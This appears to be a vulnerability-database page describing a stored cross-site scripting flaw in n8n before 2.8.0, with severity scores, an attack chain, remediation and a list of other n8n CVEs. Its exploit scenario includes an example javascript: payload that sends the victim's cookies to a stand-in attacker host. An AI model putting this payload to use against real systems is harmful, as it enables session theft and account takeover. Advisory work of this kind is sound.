Skip to main content

n8n EUVDEUVD-2026-42257

| CVE-2026-56359 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-07-08 disclosure@vulncheck.com GHSA-c4mv-j7jv-9c8f
4.8
CVSS 4.0 · Vendor: vulncheck
Share

Severity by source

Vendor (vulncheck) PRIMARY
4.8 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
5.4 MEDIUM

PR:L for required authentication, UI:R for mandatory victim click, S:C for cross-user session script execution, no availability impact applies.

3.1 AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (vulncheck).

CVSS VectorVendor: vulncheck

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
A
Scope
X

Lifecycle Timeline

2
Analysis Generated
Jul 08, 2026 - 15:05 vuln.today
Patch available
Jul 08, 2026 - 15:01 EUVD

DescriptionCVE.org

n8n before 2.8.0 contains a cross-site scripting vulnerability in the credential management flow where authenticated users can inject malicious JavaScript URLs into OAuth2 credential Authorization URL fields. Attackers can craft malicious credentials and trick victims into clicking the OAuth authorization button, executing arbitrary scripts in their browser session with the victim's privileges.

AnalysisAI

Stored cross-site scripting in n8n before 2.8.0 allows authenticated low-privilege users to inject malicious JavaScript URLs into OAuth2 credential Authorization URL fields within the credential management flow. When a victim - potentially a higher-privileged user - clicks the OAuth authorization button on the crafted credential, arbitrary scripts execute in their browser session carrying the victim's privileges. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Authenticate to n8n with low-privilege account
Delivery
Create OAuth2 credential with javascript: URI as Authorization URL
Exploit
Surface or share malicious credential to target victim
Execution
Victim opens credential and clicks OAuth authorization button
Persist
Injected JavaScript executes in victim's browser session
Impact
Exfiltrate session tokens or perform privileged in-app actions as victim

Vulnerability AssessmentAI

Exploitation The attacker must be authenticated to the n8n instance with at least low-level privilege (PR:L per CVSS 4.0 vector) and must have permission to create or modify OAuth2 credentials in the credential management interface - this is a default capability for most n8n user roles but would be blocked if credential creation is restricted to administrators only. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 score of 4.8 (AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N) accurately captures the moderate real-world risk: network-reachable with low complexity, but gated behind authenticated access (PR:L) and mandatory victim interaction (UI:A - the victim must actively click the OAuth authorization button). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An authenticated attacker with a low-privilege n8n account creates a new OAuth2 credential and sets the Authorization URL to a javascript: URI (e.g., javascript:fetch('https://attacker.example/steal?c='+document.cookie)). The attacker then surfaces this credential - through a shared workflow, a direct share, or social engineering - to a higher-privileged user such as an administrator. …
Remediation The primary fix is to upgrade n8n to version 2.8.0 or later, per the vendor security advisory at https://github.com/n8n-io/n8n/security/advisories/GHSA-364x-8g5j-x2pr. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

More in N8n

View all
CVE-2026-21877 CRITICAL POC
9.9 Jan 08

n8n workflow automation (through 1.121.2) allows authenticated users to execute arbitrary code via the n8n service, with

CVE-2026-21858 CRITICAL POC
10.0 Jan 08

n8n workflow automation (1.65.0 to 1.121.0) allows unauthenticated file access through form-based workflows. A critical

CVE-2026-1470 CRITICAL POC
9.9 Jan 27

n8n has a fifth critical RCE vulnerability (CVSS 9.9) in the Expression evaluator, enabling code execution through craft

CVE-2026-33660 CRITICAL POC
9.4 Mar 25

An authenticated user with workflow creation or modification privileges in n8n workflow automation platform can exploit

CVE-2026-33665 HIGH POC
8.8 Mar 25

Authenticated n8n users can hijack administrator accounts when LDAP authentication is enabled by manipulating their LDAP

CVE-2023-27563 HIGH POC
8.8 May 10

The n8n package 0.218.0 for Node.js allows Escalation of Privileges. Rated high severity (CVSS 8.8), this vulnerability

CVE-2026-0863 HIGH POC
8.5 Jan 18

Authenticated users can exploit string formatting and exception handling in n8n's Python task executor to escape sandbox

CVE-2023-27564 HIGH POC
7.5 May 10

The n8n package 0.218.0 for Node.js allows Information Disclosure. Rated high severity (CVSS 7.5), this vulnerability is

CVE-2023-27562 MEDIUM POC
6.5 May 10

The n8n package 0.218.0 for Node.js allows Directory Traversal. Rated medium severity (CVSS 6.5), this vulnerability is

CVE-2026-33724 MEDIUM POC
6.3 Mar 25

n8n versions prior to 2.5.0 contain a critical SSH host key verification bypass in the Source Control feature that allow

CVE-2026-33720 MEDIUM POC
6.3 Mar 25

This vulnerability in n8n (an open-source workflow automation platform) is an authentication bypass in the OAuth callbac

CVE-2026-27577 CRITICAL
9.9 Feb 25

Additional expression evaluation exploits in n8n before 2.10.1/2.9.3/1.123.22. Fourth distinct code execution path throu

Share

EUVD-2026-42257 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy